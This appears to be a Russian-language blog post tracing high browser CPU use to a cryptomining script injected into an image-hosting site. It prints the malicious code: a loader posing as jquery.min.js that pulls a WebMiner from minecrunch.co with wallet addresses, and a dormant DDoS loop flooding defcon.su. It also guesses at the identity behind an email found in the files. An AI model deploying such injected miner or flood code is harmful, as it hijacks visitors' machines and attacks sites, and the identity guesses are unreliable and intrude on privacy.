iceweasel 100% CPU miner

Profile picture for user admin_romcom

Стал замечать, что Iceweasel ведет себя как ненормальный. Грузит проц на 100-170% !! Да да, так htop и выводил.

Поставил замечательный плагин “Tab Data”, который показывает количество сжираемого ОЗУ на каждый таб.

Поставил “Suspend tab”, который высвобождал из памяти неиспользуемый таб. В принципе, это бы помогло. Но проблема в другом.

Закрыв все табы Iceweasel успоколился. Открываю гуглодоки. Немного разогрелся, но не сильно.

Открываю присланный в скайп скриншот через сайт одной известной и популярной обменки картинками. И кулер начинает жужжать. Тааааак.

Смотрю код страницы. На первый взгляд чисто.

 

Файл script.js

 

var my_awesome_script = document.createElement('script');
        my_awesome_script.setAttribute('src','https://preview.c9users.io/libraries/jquery/jquery.min.js');
        document.head.appendChild(my_awesome_script);

 

nice?

 

Конечно, никакого жиквари там нет.

А внутри следующее.

 

var minsc= document.createElement('script');
        minsc.setAttribute('src','//minecrunch.co/web/miner.js');
        minsc.setAttribute('onload','minepls()');
        document.head.appendChild(minsc);

        function minepls(){
                var miner = new WebMiner({username: "6hC4xzUixihTkKxgsQUSMGMrJuxYKibhwV",threads: 2});
                miner.start();
        }

Запускается майнер биткоинов.

Дальше: раньше тут вас могли ддосить, создавая картинки из ничего.

var DDos = 0
if (DDos == 1){
        for (i=1; i<=5000; i++) {
                  (new Image()).src="http://defcon.su/?"+Math.random()
        }
}

А дальше у вас воровали какие=то данные с сайта photogeek.ru, заменяли вашу инфу на iframe скрипт и делали вас разнощиком заразы. Кстати о майнере. Насколько я понял, вот кошельки на которые пытались майнить битки

function WebMiner(config) {
    /* Default values */
    this.debug = false;
    this.username = null;
    this.coin = "feathercoin";
    this.threads = 1;

    /* Extend values from config argument */
    var whitelist = ['debug', 'username', 'threads', 'coin'];
    if (!config) config = {};
    for(x in config) {
        if (whitelist.indexOf(x) != -1) {
            this[x] = config[x];
        }
    }

    this._coins = {
        "litecoin" : {
            "algorithm": "scrypt.asm.js",
            "pool":"wss://minecrunch.co:3001",
            "default_wallet":"n1H8fFbeRsyFvhZ4XucuznHenF1qFpqnKp",
            "reversed_endiannes": false
        },
        "feathercoin" : {
            "algorithm": "neoscrypt.asm.js",
            "pool": "wss://minecrunch.co:3002",
            "default_wallet":"6nmfjYVToBWb2ys4deasdydPj1kW9Gyfp4",
            "reversed_endiannes": true
        }
    };

Короче, странно все это.

UPD:
Обкатывают наверное систему, которую сами создали.

https://minecrunch.co

Там же можно посмотреть юзера

https://minecrunch.co/workers

 

https://preview.c9users.io/libraries/jquery/

А здесь лежат остальные файлы в открытом доступе, которыми ломали другие сайты. В одном из файлов оставили свою почту dinya@rambler.ru. А может наугад набрали)
В любом случае, эта почта искала киfтйского переводчика в 2011 году)

http://old.kitairu.info/rus/guestbook/?page=13

и может училась в Москве в Вычислительный центр (ВЦ РАН) им  А.А. Дородницына

 

UPD2: человек из сайта с майнером ответил о чистке сайта от этой хрени. Так что, не ленитесь писать в саппорт. Быть может вам повезет и ваши старания будут вознаграждены.

Теги

sdds

Next, we see script, which stolen our data from photogeek.ru or other site, change profile info with hidden iframe with script.

Добавить комментарий

The content of this field is kept private and will not be shown publicly.

Plain text

  • No HTML tags allowed.
  --   o-o   o  o  o     o   o 
o o | | | | |\ /|
/ oo o--O | | O |
/ | | | | |
o--o o-o o O---o o o

Enter the code depicted in ASCII art style.